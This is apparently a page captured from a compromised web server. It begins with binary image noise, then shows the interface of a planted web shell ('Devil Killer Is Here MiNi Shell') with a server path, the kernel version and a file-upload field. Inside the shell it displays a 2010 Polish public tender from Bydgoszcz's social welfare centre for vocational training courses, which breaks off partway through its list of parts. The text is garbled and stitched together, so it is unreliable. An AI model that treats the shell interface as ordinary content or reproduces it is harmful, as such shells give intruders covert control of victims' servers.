JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100924/262779-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Realizacja szkoleń zawodowych o profilach: brukarz, florystka z modułem kasy fiskalnej, fryzjerstwo damskie i męskie, kelner-barman, kosmetyka z elementami manicure, pedicure i przedłużania paznokci,  kurs kroju i szycia, kucharz małej gastronomii, magazynier z obsługą wózków jezdniowych, masaż z elementami refleksologii, operator maszyn do robót ziemnych - koparkoładowarki, operator usług utrzymania czystości, opiekun osób starszych, chorych i niepełnosprawnych, programowanie i obsługa obrabiarek sterowanych numerycznie CNC, spawanie blach i rur spoinami pachwinowymi metodą MIG</b><br>
<b>Numer ogłoszenia: 262779 - 2010; data zamieszczenia: 24.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Bydgoszczy , ul. Ogrodowa 9, 85-043 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 325-44-10, faks 0-52 3215535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mopsbydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja szkoleń zawodowych o profilach: brukarz, florystka z modułem kasy fiskalnej, fryzjerstwo damskie i męskie, kelner-barman, kosmetyka z elementami manicure, pedicure i przedłużania paznokci,  kurs kroju i szycia, kucharz małej gastronomii, magazynier z obsługą wózków jezdniowych, masaż z elementami refleksologii, operator maszyn do robót ziemnych - koparkoładowarki, operator usług utrzymania czystości, opiekun osób starszych, chorych i niepełnosprawnych, programowanie i obsługa obrabiarek sterowanych numerycznie CNC, spawanie blach i rur spoinami pachwinowymi metodą MIG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja szkoleń zawodowych o profilach: brukarz, florystka z modułem kasy fiskalnej, fryzjerstwo damskie i męskie, kelner-barman, kosmetyka z elementami manicure, pedicure i przedłużania paznokci,  kurs kroju i szycia, kucharz małej gastronomii, magazynier z obsługą wózków jezdniowych, masaż z elementami refleksologii, operator maszyn do robót ziemnych - koparkoładowarki, operator usług utrzymania czystości, opiekun osób starszych, chorych i niepełnosprawnych, programowanie i obsługa obrabiarek sterowanych numerycznie CNC, spawanie blach i rur spoinami pachwinowymi metodą MIG oraz spoinami czołowymi metodą MIG, sprzedawca z obsługą kas fiskalnych i minimum sanitarne, uproszczona księgowość, kadry, płace dla beneficjentów projektu systemowego Krok do przodu realizowanego przez MOPS w Bydgoszczy. 
Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2, 3, 4, 5, 6, 7, 8, 9, 10, 11,12, 13, 14, 15, 16, 17.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Realizacja szkoleń zawodowych o profilach: brukarz, florystka z modułem kasy fiskalnej, fryzjerstwo damskie i męskie, kelner-barman, kosmetyka z elementami manicure, pedicure i przedłużania paznokci,  kurs kroju i szycia, kucharz małej gastronomii, magazynier z obsługą wózków jezdniowych, masaż z elementami refleksologii, operator maszyn do robót ziemnych - koparkoładowarki, operator usług utrzymania czystości, opiekun osób starszych, chorych i niepełnosprawnych, programowanie i obsługa obrabiarek sterowanych numerycznie CNC, spawanie blach i rur spoinami pachwinowymi metodą MIG oraz spoinami czołowymi metodą MIG, sprzedawca z obsługą kas fiskalnych i minimum sanitarne, uproszczona księgowość, kadry, płace dla beneficjentów projektu systemowego Krok do przodu realizowanego przez MOPS w Bydgoszczy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca wykaże, iż jest wpisany do właściwego rejestru i przedstawi na tę okoliczność dokument wystawiony nie wcześniej niż  6 m-cy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca dostarczy wykaz co najmniej 1 wykonanej/wykonywanej usługi o co najmniej takiej wartości jak wartość wykazana w składanej ofercie w niniejszym postępowaniu oraz  co najmniej 1 dokument ( m.in. referencje, listy rekomendacyjne, faktura z wyciągiem bankowym) potwierdzający, że usługa/usługi (  wym. w wykazie) została/zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca dostarczy wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca przedstawi informację finansową określającą obroty, zysk, zobowiązania i należności za lata od 2007 do 2009 r., a w przypadku gdy Wykonawca rozpoczął działalność gospodarczą w okresie późniejszym należy podać za ten okres. Do postępowania zostaną dopuszczeni Wykonawcy, których wynik finansowy w każdym roku  kalendarzowym nie był ujemny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Program kursu z uwzględnieniem tematyki i ilości godzin szkolenia,zaświadczenie o wpisie do rejestru instytucji szkoleniowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsbydgoszcz.pl ( BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
85-043 Bydgoszcz
ul.Ogrodowa 9
II piętro
p.43.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2010 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej
85-043 Bydgoszcz
ul.Ogrodowa 9
II piętro
p.43.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 02.11.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Krok do przodu w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013 współfinansowanego z Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Poddziałanie 7.1.1. Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu brukarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia brukarz dla 2 osób uprawniającego uczestnika do wykonywania zawodu.
Szkolenie obejmuje :
Blok zajęć teoretyczno-praktycznych - minimum 170 h dydaktycznych ( w tym do 25% godzin teorii); 
- 1 godzina dydaktyczna = 45 minut
- szkolenie BHP,
- odczytywanie projektów brukarskich,
- szkicowanie projektów brukarskich,
- obsługa niwelatora i poziomicy,
- zastosowanie i obsługa narzędzi brukarskich ręcznych,
- zastosowanie i obsługa maszyn brukarskich,
- systematyka materiałów stosowanych w brukarstwie,
- organizacja pracy i rozliczanie prac brukarskich,
- przygotowanie podłoża do prac brukarskich,
- ustawianie obrzeży, krawężników, oporników,
- układanie kostki betonowej i granitowej w różne wzory..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu florystka z modułem kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia florystycznego z modułem obsługi kasy fiskalnej dla 6 osób mającego na celu przygotowanie uczestnika do wykonywania pracy.

Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 100 godzin dydaktycznych
 ( w tym do 25% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- pielęgnacja kwiatów, narzędzia i środki techniczne,
- kompozycje z roślin suchych, sztucznych i żywych,
- dekoracje i kompozycje z kwiatów ciętych,
- kompozycje w naczyniach,
- układanie bukietów i wiązanek okolicznościowych (ślubne, komunijne,  
   żałobne itp.),
- dekoracje i stroiki świąteczne i okolicznościowe,
- techniki barw, klejenia, drutowania, wiązania,
- techniki sprzedaży,
- obsługa kas fiskalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 27.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu fryzjerstwo damskie i męskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia z zakresu fryzjerstwo damskie i męskie dla 2 osób, mającego na celu przygotowanie uczestnika do wykonywania zawodu.

Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 200 h dydaktycznych ( w tym do 25% godzin teorii),
- 1 godzina dydaktyczna = 45 minut,
- szkolenie BHP,
- specyfika działania salonu fryzjerskiego,
- narzędzia i osprzęt fryzjerski,
- techniki mycia głowy,
- podstawy stylizacji, stylizacja okazjonalna, najnowsze trendy stylizacji,
- techniki strzyżeń,
- koloryzacje, błędy w koloryzacji i sposoby ich korekty,
- ondulacja i jej sposoby,
- rozwój umiejętności interpersonalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu kelner-barman.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia kelner-barman dla 4 osób mającego na celu przygotowanie uczestnika do wykonywania zawodu.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 140 h dydaktycznych ( w tym do 25% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- szkolenie BHP,
- podstawy działania lokalu gastronomicznego i baru,
- podstawy sztuki kelnerskiej,
- wyposażenie sali konsumpcyjnej,
- przygotowanie stołu dla konsumenta,
- typologia potraw,
- obsługa klienta przy stole,
- podstawy sztuki barmańskiej,
- szkło barowe i jego zastosowanie,
- obsługa sprzętu używanego przez barmanów,
- typologia napojów bezalkoholowych i alkoholowych,
- przygotowanie i serwowanie napojów bezalkoholowych i alkoholowych,
- rozwój umiejętności interpersonalnych,
- techniki sprzedaży w lokalu gastronomicznym i barze,
- obsługa kas fiskalnych,
- ćwiczenia kompletnej obsługi klienta przy barze i w lokalu gastronomicznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 27.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu kosmetyka z elementami manicure, pedicure i przedłużania paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia kosmetyka z elementami manicure, pedicure i przedłużania paznokci dla 13 osób mającego na celu przygotowanie uczestnika do wykonywania zawodu.

Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 150 h dydaktycznych ( w tym do 30% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- szkolenie BHP,
- anatomia dłoni i stóp,
- dermatologia schorzeń,
- manicure tradycyjny, biologiczny, pedicure kosmetyczny,
- budowa paznokcia,
- masaż dłoni i stóp,
- zabiegi pielęgnacyjne
- zdobienie paznokcia, metody przedłużania paznokci
- depilacja ciała,
- techniki makijażu,
- elementy kosmetyki ciała,
- podstawy wizażu, kreacja wizerunku w pracy zawodowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za 1 szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Realizacja szkolenia zawodowego - kurs kroju i szycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia kroju i szycia dla 3 osób mającego na celu przygotowanie uczestnika do wykonywania zawodu. 
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum  150 h dydaktycznych 
( w tym do 30% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- organizacja stanowiska pracy,
- przepisy BHP,
- towaroznawstwo i materiałoznawstwo,
- techniki krawieckie,
- wybrane zagadnienia z rysunku zawodowego,
- szycie ręczne,
- formy krawieckie,
- krojenie elementów odzieży,
- nauka szycia na maszynie,
- poprawki krawieckie,
- stylizacja własnej garderoby,
- konstrukcje form odzieżowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za 1 szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia kucharz małej gastronomii dla 11 osób uprawniającego uczestnika do wykonywania zawodu.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 200 h dydaktycznych ( w tym do 25% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- szkolenie BHP,
- wymogi systemu HACCP,
- zasady żywienia, 
- wyposażenie techniczne zakładów gastronomicznych,
- technologia gastronomiczna z towaroznawstwem,
- podstawy sztuki kucharskiej,
- systematyka składników mięsnych i jarskich,
- typologia potraw,
- metodologia przyrządzania potraw jarskich,
- przepisy kulinarne kuchni staropolskiej i międzynarodowej,
- sposoby serwowania dań,
- zajęcia praktyczne z wykorzystaniem poznanych metod i przepisów,
- obsługa kasy fiskalnej,
- rozwój umiejętności interpersonalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za 1 szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu magazynier z obsługą wózków jezdniowych.</p>
